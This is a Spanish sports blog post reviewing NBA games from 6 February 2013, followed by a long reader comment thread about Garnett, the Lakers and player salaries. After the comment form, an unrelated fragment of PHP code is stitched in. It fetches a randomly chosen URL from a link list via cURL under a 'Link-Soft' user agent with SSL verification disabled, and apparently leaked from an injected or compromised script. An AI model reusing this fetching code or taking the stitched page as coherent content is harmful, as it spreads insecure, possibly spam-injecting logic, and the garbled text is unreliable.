La Crónica: Celtics suma y sigue

07 de February de 2013 por Simon

Jornada larguísima, la del 6 de febrero en la NBA, con 13 partidos disputados que siguen aclarando o encogiendo la clasificación en cada caso.

kg raptorsLa jornada comenzó con Boston visitando tierras canadienses para enfrentarse a los renovados Raptors (99-95) que anoche pudieron contar con Andrea Bargniani después de un largo tiempo ausente por lesión. Si algo han demostrado los Celtics a lo largo de su historia es la casta característica de este equipo, sin Rondo ya son 5 las victorias seguidas y ayer remontaron 10 puntos en el último cuarto para llevarse la victoria y afianzarse en puestos de Play Off. Su rival directo en esta lucha, Philadelphia, sigue sin levantar cabeza y anoche se quedaron en 69 puntos, y es que a este equipo le cuesta horrores anotar con fluidez y eso, enfrentándote a la mejor defensa de la liga como es actualmente Indiana Pacers, se paga. (88-69). Si Granger consigue (y acepta) aclimatarse al rol de suplente anotador estos Pacers pueden sorprender a cualquiera.

Los líderes del Oeste demostraron estar a otro nivel de juego actualmente, sobre todo Oklahoma City Thunder, que tenía un partido comprometido ante los pujantes Golden State Warriors, que anoche no fueron rival para Durant & Co. (98-119). Desde el inicio Thunder impuso su juego de transiciones rápidas y las ventajas se fueron por encima de los 15 puntos, con lo que el partido quedó sentenciado pronto y posibilitó el descanso de los titulares de Thunder. Descanso que anoche no pudieron tener San Antonio Spurs en su visita al Target Center de Minneapolis, pues los Wolves les pusieron las cosas difíciles durante todo el partido. No obstante Spurs tuvo que tirar de todas las armas de las que disponía (Duncan y Ginobili fueron baja) para que el partido no se les escapara (104-94). Impresionante partido de la pareja Parker-Green. Anoche el escolta anotó 28 puntos con 8/12 desde el perímetro y el base francés no fue menos y anotó 31 puntos, a los que sumó 8 asistencias y 5 rebotes. Si Tony Parker fuera MVP a final de temporada no debería sorprendernos, pero tranquilos, no sucederá por más merecido que sea.

ariza meloMiami Heat afrontaba un partido complicado ante Houston Rockets sin Chris Bosh. Wade y James redoblaron esfuerzos y suplieron la baja de Bosh a la perfección. El partido siempre fue de cara para Miami, incluso en el tercer cuarto la ventaja superó los 10 puntos durante unos minutos y así ocurrió en el último cuarto, Rockets por debajo todo el rato y tan sólo a falta de un minuto pudo acercarse a 3 puntos pero no pudieron dar el toque final y Miami se llevó la victoria 108-114 para destacarse un poco en el liderato pues su rival, NYK, perdió ante Washington Wizards, que se han convertido esta temporada en una especie de mata-gigantes. El partido se mantuvo empatado o ambos equipos con exiguas ventajas casi todo el tiempo hasta el último cuarto, en el que la endiablada velocidad de Wall y la resurrección de entre los muertos de Trevor Ariza llevaron a Wizards a la victoria (99-106).

Clippers volvió a la senda de la victoria aprovechándose del mal momento de Orlando Magic, que ya llevan 11 derrotas consecutivas. Griffin, Paul y Jamal Crawford fueron baja, lo que dejaba muy tocada a la plantilla de Clippers, pero este equipo es muy profundo y lo demostró anoche con buenos minutos de prácticamente todos los jugadores. Bledsoe fue el líder ofensivo y bastión del equipo con 27 puntos y 6 robos (86-76).

El que no pudo romper su racha negativa fue Memphis Grizzlies, que volvió a caer, esta vez ante Atlanta Hawks (92-103). Tanto Smith como Horford y Teague hicieron anoche un gran partido que  permitió a Atlanta no pasar apuros. Randolph, Gasol y Conley estuvieron razonablemente bien en labores atacantes e incluso Bayless ayudó desde el banquillo pero se vieron muy solos y se evidenció una noche más un claro problema de capacidad creativa desde el perímetro a la hora de atacar el aro. Ojo porque Memphis ya es quinto en el Oeste.

En el resto de partidos en la conferencia Oeste, Dallas venció a Portland en la victoria número 500 de Rick Carlisle, con un OJ Mayo espectacular (99-105). Utah hizo valer su localía ante Bucks y venció (86-100) y cada vez están más asentados en esa séptima plaza que ocupan actualmente. New Orleans venció en el duelo de colistas del Oeste a Phoenix por (84-93) en otro grandísimo partido de Greivis Vásquez.

En los partidos del Este, Brooklyn venció a Detroit Pistons merced a un gran último cuarto (93-90). Calderón terminó con 8 puntos y 9 asistencias su segundo partido como Pistons. El momento gracioso del partido lo protagonizó Mirza Teletovic, que lanzó hasta 3 airballs seguidos, lo que provocó el enfado de su entrenador y ser sentado en el banquillo. En el partido de bajos fondos del Este, Cleveland dio una buena tunda a Charlotte Bobcats (95-122) gracias a su trío de prometedores jugadores: Thompson, Irving y Waiters se combinaron para 58 puntos con 24 de 34 en tiros de campo.

PREMIOS

wade rocketsMVP: Que nadie se olvide que en los Heat juega un tal Dwyane Wade. Anoche lideró a los Heat con 31 puntos, 5 rebotes, 8 asistencias, 4 robos y 2 tapones, uno de ellos clave para acabar imponiéndose a los Rockets.

Rookie: Un día más Damian Lillard demuestra que no tiene rival. Ayer fueron 19 puntos, 4 rebotes y 6 asistencias. Dion Waiters también anotó 19 puntos mientras que Kyle O’Quinn, que está ganando minutos tras la lesión de Davis, nos dejó 10 puntos y 9 rebotes.

Sorpresa: ¿Se puede anotar 17 puntos, capturar 9 rebotes y poner 5 tapones en apenas 17 minutos? Enes Kanter, sí. Por su parte, Ryan Hollins jugó su mejor partido de la temporada con 13 puntos, 8 rebotes y 2 tapones y Danny Green se fue a los 28 puntos ante los Wolves.

Decepción: Kemba Walker empalideció ante Kyrie Irving. El de los Bobcats se quedó en 5 puntos con un 2 de 11 en tiros de campo. Evan Turner tiró igual de mal para anotar sólo 1 de sus 10 lanzamientos a canasta.

Esfuerzo en vano: James Harden se multiplicó ante los Heat y acabó el partido con 36 puntos, 12 rebotes, 7 asistencias y 3 robos pero no fue suficiente para superar al MVP del día.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

37 comentarios a esta entrada

  1. Pop dice:
    #1

    Dios cuántos pasos da Wade después de robar el balón??

      Citar

  2. GreenPride dice:
    #2

    Jornada interesante anoche-
    En Oklahoma los Thunder machacaron sin problemas a unos Warriors que parecen perder fuelle ante los equipos punteros. Desde el principio los Thunder marcaron diferencias guiados por un primer cuarto espectacular de Ibaka y luego por la aportación de unos acertados Durant, Westbrook y Martin. Los Warriors sin Bogut ni Jack no dieron nunca impresion de poder entrar en el partido y volvieron a no defender nada y sin defensa….
    En Miami los sorprendentes Rockets fueron haciendo la goma ante unos Heat sin Bosh pero aupados por sus dos grandes espadas. James y Wade se mostraron muy superiores a sus pares y mantuvieron siempre por delante a Miami. Por Houston partidazo de Harden que mantuvo hasta donde pudo a su equipo incluidos 11 puntos consecutivos en el último cuarto ante la defensa de LeBron para ponerlos a 3. Finalmente no pudieron con los campeones.
    Del resto destacar la 5ª victoria consecutiva de Boston que ya ha cogido a los Bucks de nuevo y aleja a Philly, la nueva victoria de unos lanzados Pacers que ya miran de reojo al segundo puesto de los Knicks, la 11ª victoria consecutiva de los Spurs (y sin Duncan ni Ginobilli) que cracks los del Álamo y la nueva derrota de Memphis que ya es superado por Denver y tiene a medio partido a los Warriors.
    También se confirmó los malos presagios para Gasol. Su lesión le manda fuera justo cuando mejor estaba jugando y con los Lakers en buena racha y deja a los Lakers en situación desesperada sin juego interior y todavía a 3-4 partidos de los PO
    Y esta noche Celtics-Lakers, este año un poco venido a menos pero siempre un clásico y con los dos en buenas rachas de resultados. Como buen aficionado verde…. Beat LA, Beat LA!

      Citar

  3. Ruxixón dice:
    #3

    Los Warriors desde el affaire “Stephen Curry no va al All Star” han desconectado un poco de la competición,sobre todo a ese nivel defensivo que quiere Jackson que tenga el equipo.Van a meterse en PO seguro si no hay descalabro en forma de lesiones pero si más pronto que tarde recuperan sensaciones -no hay que olvidar que todos los equipos pasan por baches de juego y resultados en una temporadatan larga- mejor que mejor.Soy de los que apuestan a que en los PO si recuperan ese espíritu pueden darle un susto a cualquiera.

    Los que no parecen tan peligrosos son los Grizzlies,a los que les va a venir muy bien el parón del ASG.Sinceramente creo que se equivocaron por los jugadores que han recibido y eso que parece que Bayless ha espabilado mucho en estos últimos encuentros,pero las carencias que había con Rudy Gay siguen ahí,y ahora mismo tiene tufo de equipo deprimido.A ver si consiguen la química pronto.Sigo opinando que el proyecto se finiquita en verano con el traspaso de Randolph,y como lo regalen volvemos a los Grizzlies de antaño.

    ¿Habrá rifirrafe Sacre-Garnett today? Sin Gasol ni Howard,el sueño de D’Antoni de jugar sin pívots,ya no tiene excusas.

      Citar

  4. GreenPride dice:
    #4

    Por cierto declaraciones de Garnett antes del partido ante Toronto referente a los rumores de traspaso para él: “I bleed green. I die green.” (Algo así como “Sangro verde y muero verde” ¡Como me gusta lo flipao que está este tío!!

      Citar

  5. Denise dice:
    #5

    GreenPride:
    Por cierto declaraciones de Garnett antes del partido ante Toronto referente a los rumores de traspaso para él: “I bleed green. I die green.” (Algo así como “Sangro verde y muero verde” ¡Como me gusta lo flipao que está este tío!!

    Si tanto ama Boston que hubiera renovado por el mínimo dejando espacio salarial para otro crack. Que mal me caen aquellos que van de “yo siento los colores” y luego se venden al mejor postor…además de chulo sinverguenza, que hipocrita es el Kevin Garnett éste…

      Citar

  6. ralage dice:
    #6

    Luego la cosa acabó como acabó pero que grande Harden llevando a su equipo del 95-104 al 106-109 con 11 pts seguidos!

      Citar

  7. Jose Luis dice:
    #7

    Hombre Denise, yo sí creo que Garnett siente los colores, y puede ser de los pocos jugadores NBA que lo hagan y lo demuestren (con Pierce, Bryant, Dirk, Rondo, Duncan, quizá Nelson). Pero eso de cobrar el mínimo, no suele hacerse en la NBA. Y por una parte es raro, porque con lo que han ganado ya, lo que ganan por publicidad, etc etc, bien podrían haberlo hecho varios jugadores más. Además, algunos tienen cláusula de vetar traspaso, de manera que tampoco pueden defenderse en plan “si me mandan a Bobcats, por lo menos estoy cobrando bien”.

    No sé, es raro. Quizá ese contrato sea una forma de defenderse por si desmantelan el equipo, no quedar con el mínimo y sin jugar algo importante. Va más con el estatus y el prestigio que con otra cosa, allí en USA se tiene pensado así y no va a cambiar a corto plazo. Es como lo de cuando ganas por 3 en lo últimos segundos no hacer falta y 2 tiros libres al rival. Ven “bien” el Hack-a-quién-sea pero no el hacer falta si vas ganando por 3. Cosas de la NBA.

      Citar

  8. yuntas dice:
    #8

    Creo que por respeto, KG después de un par de años ya tenia dinero para sus nietos y firmo un contrato gigantesco con Minni. Seria desvirtuar la liga que KG, o Kobe o Kevin Durant, como ya son millonarios cobrasen menos que Iman Shumpert. Además esta visto que los GM se pasan las figuras de su equipo por ya sabemos donde cuando usan a sus estrellas como expirings, cuando estas han sido muchas veces la causa de que la franquicia sea minimamente atractiva.

      Citar

  9. yuntas dice:
    #9

    Si KG no jugara en Boston no iría a jugar allí ni Ben Gordon.

      Citar

  10. Denise dice:
    #10

    Jose Luis:
    Hombre Denise, yo sí creo que Garnett siente los colores, y puede ser de los pocos jugadores NBA que lo hagan y lo demuestren (con Pierce, Bryant, Dirk, Rondo, Duncan, quizá Nelson). Pero eso de cobrar el mínimo, no suele hacerse en la NBA. Y por una parte es raro, porque con lo que han ganado ya, lo que ganan por publicidad, etc etc, bien podrían haberlo hecho varios jugadores más. Además, algunos tienen cláusula de vetar traspaso, de manera que tampoco pueden defenderse en plan “si me mandan a Bobcats, por lo menos estoy cobrando bien”.

    Pero por qué siente los colores?? Por llevar 5 años allí…, Que me lo digas de Paul Pierce que lleva toda su vida me lo creo, pero no de KG. Todos los jugadores que me has nombrado son tios que solo han estado en un equipo y ahí si es mas creible.
    Quizas me equivoque y me deis un zas en la boca, pero no escuché a KG cuando estaba en Minny con Casell, Sprewell y Sczerbiak pedir el traspaso a Boston… o haber dicho durante sus 10 años en Minnessota “I love Boston”.

    Que es un tio que le echa huevos nadie lo duda, pero que no se ponga en plan Alfonso el futbolista diciendo “yo siempre he sido de aquí..” . Veremos a ver si dentro de poco no está pidiendo el traspaso.

      Citar

  11. Denise dice:
    #11

    yuntas:
    Si KG no jugara en Boston no iría a jugar allí ni Ben Gordon.

    de verdad lo crees?? Boston es un equipo mítico, tanto que es el que más anillos tienes. Creo que cualquier agente libre ante una oferta de Boston se la debe de pensar 2 veces antes de rechazarla.

      Citar

  12. Jose Luis dice:
    #12

    Pero Boston es distinto, al igual que San Antonio. Se crea un hogar al estar tanto tiempo mismos jugadores, mismo entrenador, misma forma de jugar. Boston es una identidad. Creo que es un hogar para él, ha calado hondo todo lo del orgullo verde,el ubuntu… Creo que Garnett siente a los Celtics como algo muy especial, yo lo veo así, aunque puedo equivocarme, por supuesto.

    Lo de los sueldos es eso. Hemos visto bajárselo a Duncan, Dirk, Garnett, etc como favor a sus franquicias para poder hacer un equipo ganador, pero no van a cobrar el mínimo. Incluso James, Wade y Bosh no cobraron el máximo para unirse y hacer un equipo más potente.

      Citar

  13. Esteban dice:
    #13

    Denise: Si tanto ama Boston que hubiera renovado por el mínimo dejando espacio salarial para otro crack. Que mal me caen aquellos que van de “yo siento los colores” y luego se venden al mejor postor…además de chulo sinverguenza, que hipocrita es el Kevin Garnett éste…

    grande denise, no lo podrias decir mejor, si garnett renovaba por el minimo o al menos por una excepcion de nivel medio, los celtics hubiesen sido candidatos al titulo, si tanto lo desea, lo hubiese hecho

    en argentina le deciemos a eso, “vende humo”

      Citar

  14. yuntas dice:
    #14

    Vamos que si KG no iba a Boston, los célticos se quedaban con Pierce, Jefferson y ni hubieses pasado hasta el día de la fecha una ronda de PO. Además mas alla del mito, NY, LA, Miami, Chicago, Dallas y Houston son mercados mas grandes y equipos míticos también son Golden State, Detroit y Philadelphia y nadie se muere por jugar allí. Ademas de que el noereste es frio, triste y la conferencia del Este es la perra del Oeste desde hace una decada mínimo, ya solo por los colores del los uniformes tienen mas seguidores.
    No se puede pedir que KG cobre menos de lo que cobra, ni Gasol, ni Bryant, ni Dirk, ni Duncan porque su estatus en la liga merece que cobren eso y seria desvirtuar totalmente la competicion que los veteranos despues de cobrar su segundo contrato, el mas grande, se bajen el sueldo porque ya tienen dinero, mientras Bargnani, Outlaw, Ben Gordon y Charlie Villanueva cobran lo que cobran. Seria aristocratizar la liga, pues sabemos que cuando se pide un traspaso los jugadores van a equipos competitivos o mercados grandes. Entonces Boston renueva a KG por el minimo o LAL a Gasol por el mínimo y sus equipos entran a la agencia libre a repescar los jugadores jovenes que cedieron en el traspaso por lo que LAL o Boston podrian haber fichado a Wade, Bosh, Jefferson, Marc Gasol y se acabo la liga pasa a ser de 10 equipos.
    Además del respeto al juego que cada jugador da en la cancha.

      Citar

  15. Denise dice:
    #15

    Jose Luis:
    Pero Boston es distinto, al igual que San Antonio. Se crea un hogar al estar tanto tiempo mismos jugadores, mismo entrenador, misma forma de jugar. Boston es una identidad. Creo que es un hogar para él, ha calado hondo todo lo del orgullo verde,el ubuntu… Creo que Garnett siente a los Celtics como algo muy especial, yo lo veo así, aunque puedo equivocarme, por supuesto.

    Lo de los sueldos es eso. Hemos visto bajárselo a Duncan, Dirk, Garnett, etc como favor a sus franquicias para poder hacer un equipo ganador, pero no van a cobrar el mínimo. Incluso James, Wade y Bosh no cobraron el máximo para unirse y hacer un equipo más potente.

    No, no digo que te equivoques, si no hay verdad absoluta en esto, lo que me parece es una hipocresia de Garnett el repentino amor que siente ahora por Boston. Puede que lo sienta por el actual grupo con Pierce, Rondo, Rivers, etc…pero como ya dije me recuerda a Alfonso, para quien no lo sepa, un futbolista delReal Madrid criado en su cantera, que tras marcharse de allí por la puerta de atrás, fichó años después por el Barça y en su presentación dijo que había sido desde el Barça desde siempre…Vamos No me Jodas!!

      Citar

  16. Denise dice:
    #16

    yuntas:
    Vamos que si KG no iba a Boston, los célticos se quedaban con Pierce, Jefferson y ni hubieses pasado hasta el día de la fecha una ronda de PO. Además mas alla del mito, NY, LA, Miami, Chicago, Dallas y Houston son mercados mas grandes y equipos míticos también son Golden State, Detroit y Philadelphia y nadie se muere por jugar allí. Ademas de que el noereste es frio, triste y la conferencia del Este es la perra del Oeste desde hace una decada mínimo, ya solo por los colores del los uniformes tienen mas seguidores.

    ¿Como puedes decir que no hubiesen pasado ni una ronda?? Eso no puede ni saberse, además Al Jefferson es un pedazo jugador como la copa de un pino y en ese momento tenía contrato de rookie, mas Pierce, la evolución de Rondo; los Celtics tenían margen salarial para fichar ese año o los posteriores a grandes jugadores más la base de éstos 3 jugadpres…vamos que ahora Garnett es la panacea de un equipo como Boston..xD

      Citar

  17. yuntas dice:
    #17

    Si la verdad es que no puede saberse nada de eso. Yo especulo que mas allá del margen salarial y lo que me justa a mi también Jefferson, en la agencia libre había un Boston muuuy deprimido.
    Jefferson jugo al lado de Deron que en ese momento era mucho mas que Rondo y que Pierce (esto lo digo a boca de jarro) y no paso nada.
    No neguemos que Garnett era el jugador que era, ni Jefferson, ni Pierce son Garnett por mas que a muchos les duela por ser un bocon y un maton y entre los agente libres pocos podían darle a la franquicia lo que KG le dio a Boston, porque KG es de los grande jugadores y con un poquito mas.
    Pues esta bien tu punto, ninguno de nosotros puede juzgar la sinceridad celtica de Garnett, quizá el si es un verde a muerte o quizá es otra boconada y que para demostrarlo mas que hablar debería cobrar menos.
    Pero yo opino que KG de ningún modo tiene que cobrar menos, las reglas es que si eres un jugador del tamaño de KG seria una injusticia por él y por el resto de los equipos que cobre menos y Boston a llorar al campito si Terry, Green, Fab Melo y Wilcox no funcionan. Ellos dejaron pasar en los ultimos dos draft a Vasquez, Isaiah Thomas por ejemplo y eso no es culpa de los contratos de Garnett y Pierce. Eso es lo justo para New Orleans o Sacramento.

      Citar

  18. Denise dice:
    #18

    Ya, yo tampoco estoy de acuerdo con que grandes jugadores vayan a por el minimo salvo cuando ya tienen mas de 37 años y tienen que buscar un rol acorde a su rendimiento si quieren ganar un anillo. Pero muchos podrían tener el detalle de congelar o rebajarse el sueldo. Por ejemplo, si Kobe quiere ganar mas anillos, debería haber rechazado él no firmar 25 kilos la anterior campaña, 27 kilos la actual y 30 para la proxima temporada. Después cuando se eliminan, suelen culpar al banquillo de que es una mierda….

    Pero el repentino amor verde de KG es un cuento a chino.

      Citar

  19. yuntas dice:
    #19

    Ok creo que 25 kilos por un jugador siempre es demasiado, aunque Kobe para mi debería cobrar todo el salary cap porque es un genio absoluto del baloncesto XD.
    Pero Garnett cobra 11,5 quiza es un poco alto para su rendimiento, pero ahi tienes a Green cobrando 8, Brandon Bass 6 y Terry 5. Entre los tres están en 19, entonces cuál es el problema salarial de Boston.
    Ojo que si llega a ir Bledsoe por Garnett ese contrataso será responsable de que lleguen uno o dos mas. San Ainge y San Garnett.

      Citar

  20. yuntas dice:
    #20

    Por otro lado Kobe no ha sido culpable de nada por su salario, Llegaron Howard, Nash, Jamison, deberian tener 40 partidos ganados a esta altura.

      Citar

  21. lost dice:
    #21

    Me dan pena los Pacers. Cada año les pasará lo mismo en PlayOffs. En mi opinión les falta ESO para aspirar a unas finales de Conferencia. No están en mis 4 primeras opciones del Este, imaginaos.

      Citar

  22. Jose Luis dice:
    #22

    Dwight juega esta noche. Veremos en qué estado.

      Citar

  23. Jose Luis dice:
    #23

    Deseando ver los duelos Howard-Garnett, Peace-Pierce, Bryant-Lee, Nash-Bradley… ¿o estos dos últimos serán al reves?

      Citar

  24. MagicJohnson32 dice:
    #24

    Jose Luis:
    Deseando ver los duelos Howard-Garnett, Peace-Pierce, Bryant-Lee, Nash-Bradley… ¿o estos dos últimos serán al reves?

    De entrada creo que serán como tú dices, salvo que creo que MWP estará sobre Bass y Clark sobre Pierce. En unos minutitos lo comprobamos.

      Citar

  25. Jose Luis dice:
    #25

    Noooo el duelo Peace-Pierce echado por la borda! Pues vaya, siempre saltan chispas, aún recuerdo aquel partido en el que Kobe se quita de encima a Allen para anotar y Peace provoca falta en ataque de Pierce.

    Con este lío, que no os sorprenda si escribo Pearce esta noche… tendréis que adivinar a quién me refiero xD

      Citar

  26. MagicJohnson32 dice:
    #26

    Metta Pauld Pearce xD

      Citar

  27. Jose Luis dice:
    #27

    jajajajaja

    Está chunga la cosa. Howard no sabe a quién defender, Garnett juega muy abierto, y los rebotes ofensivos están siendo un problemón. Aparte, cuesta mucho jugar sin Pau ni Kobe en la pista, puf.

      Citar

  28. Jose Luis dice:
    #28

    Tampoco entiendo el pedazo de descanso que lleva Kobe…

      Citar

  29. MagicJohnson32 dice:
    #29

    Jose Luis:
    Tampoco entiendo el pedazo de descanso que lleva Kobe…

    Últimamente D’Antoni alarga más los descansos de Kobe, que yo lo entiendo, pero claro, pasa lo que pasa.

      Citar

  30. Jose Luis dice:
    #30

    Green está violando a Jamison en cada posesión. Y Ebanks sin minutos…

      Citar

  31. Jose Luis dice:
    #31

    Una duda… ¿Howard puede coger su propio rebote en los libres? es decir, ¿no comete ninguna violación si el balón da en el aro y lo coge no? La mayoría dan en la parte que una aro y tablero y sale hacia delante, tendría muchísimas opciones de cogerlos si quisiera.

      Citar

  32. Jose Luis dice:
    #32

    Los Lakers hoy no se han presentado a jugar. Hay mucha diferencia entre jugar con Gasol, que hace mucho juego combinativo, y jugar con Howard que tal como está apenas puede anotar. No tiene la fuerza/agilidad para ganar posición en el poste ni consigue rebotes ofensivos en posiciones de tiro. Qué mal veo la temporada, puf… cambiaría ahora mismo el periodo de baja de Gasol y se lo pondría a Howard, sin pensármelo.

      Citar

  33. MagicJohnson32 dice:
    #33

    Jose Luis:
    Los Lakers hoy no se han presentado a jugar.

    No diría tanto. Al descanso pierden por 14, han fallado 10 tiros libres y 10 triples, la mayoría de ellos tirando solos. Un acierto normalito en el tiro y el partido estaría muy igualado.

    En todo lo demás coincido contigo.

      Citar

  34. Jose Luis dice:
    #34

    Bueno, me he pasado un poco, pero la defensa está haciendo aguas, y no hay un plan de juego ciertamente… este partido está complicado ya. Igualmente, si le entran algunos triples ahora, puede equilibrarse la cosa. Pero es que cada ataque es improvisado, jugadores que no saben bien qué hacer… voy a ver los primeros 6 minutos, y según como lo vea me quedo más o no, que mañana tengo examen.

      Citar

  35. MagicJohnson32 dice:
    #35

    Pues nada, buena suerte con el examen.

      Citar

  36. Jose Luis dice:
    #36

    Encajar 37 puntos de los Celtics en un cuarto… 95 en tres cuartos…

    Creo que se ha acabado la temporada. Quizá sólo sea un mal partido, y vuelvan a jugar y meterse en la lucha por PO lleguen o no. Pero hoy se han dado indicios de que no, este equipo sin Gasol apenas juega, no hay juego combinativo, Kobe se siente más sólo que nunca y yo digo, hoy 8 de febrero, que no vuelven a entrar en dinámica de luchar por los PO. La lesión de Gasol es el fin de temporada de los Lakers.

    Y no me cansaré de decirlo, Howard no es jugador para jugar con Nash. Es más, casi los veo incompatibles. Nash necesita tiradores abiertos y un hombre capaz de producir un tiro en salto preciso y con elevación desde 5-6 metros y a la vez capaz de conducir asta un mate, siendo medianamente bueno en tiros libres para que no vayan a meterte el hachazo en cada jugada.

    Por otro lado, el juego de Howard, poste bajo y me lo guiso-me lo como, que tal como está de forma y salud pues no puede hacelo. Aparte, dudo mucho que una llegada de, por ejemplo, Smith o el mismo Stoudemire de hace 3 años mejorase este equipo, porque la zona estaría ocupada por el defensor de Howard, que o está en la zona o está flotado y su defensor en la zona. Para mí, son incompatibles, ya se vio cuando se unieron Nash y O’Neal. Nash necesita un tipo de jugador muy específico para funcionar a pleno rendimiento, y además tiene ya 39 años y no está para echarse un equipo a la espalda y anotar 15-20 puntos por noche.

    Malos años le tocan a los Lakers, quizá el próximo año con un Howard sano al 100% cambie un poco esta dinámica, pero sigo sin ver poder jugar bien juntos a Nash y Howard. Y les quedan 2 años juntos, de seguir ambos en Lakers.

      Citar

  37. Jose Luis dice:
    #37

    Gracias, mañana me pasaré a comentar de nuevo a ver qué tal las impresiones de los foreros. Buenas noches Magic.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>